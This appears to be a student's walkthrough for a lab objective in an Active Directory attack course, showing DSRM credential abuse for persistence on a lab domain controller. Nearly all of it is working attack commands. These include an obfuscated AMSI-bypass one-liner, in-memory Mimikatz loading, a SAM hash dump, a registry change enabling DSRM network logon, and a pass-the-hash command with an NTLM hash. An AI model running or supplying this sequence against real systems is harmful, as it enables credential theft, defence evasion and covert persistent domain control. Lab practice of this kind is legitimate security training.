Obj 11 DSRM

Task - Use Domain Admin privileges obtained earlier to abuse the DSRM credential for persistence.

Start a new session on the DC

PS C:\AD\Tools\Tools> $sess = New-PSSession dcorp-dc.dollarcorp.moneycorp.local
PS C:\AD\Tools\Tools> Enter-PSSession -Session $sess

Disable AMSI on the DC

[dcorp-dc.dollarcorp.moneycorp.local]:PS C:\Users\svcadmin\Documents> S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

Back on the host machine Load Mimikatz into memory on the $sess

PS C:\AD\Tools\Tools> Invoke-Command -FilePath C:\AD\Tools\Invoke-Mimikatz.ps1 -Session $sess

Enter back into the PSSession on the DC

PS C:\AD\Tools\Tools> Enter-PSSession -Session $sess

Dump the creds of the DC with Mimikatz

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'

Modify the registry on the DC

New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD

Pass the hash

Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dcorp-dc /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd  /run:powershell.exe"'

Access the DC

PS C:\Windows\System32> ls \\dcorp-dc.dollarcorp.moneycorp.local\c$

Last updated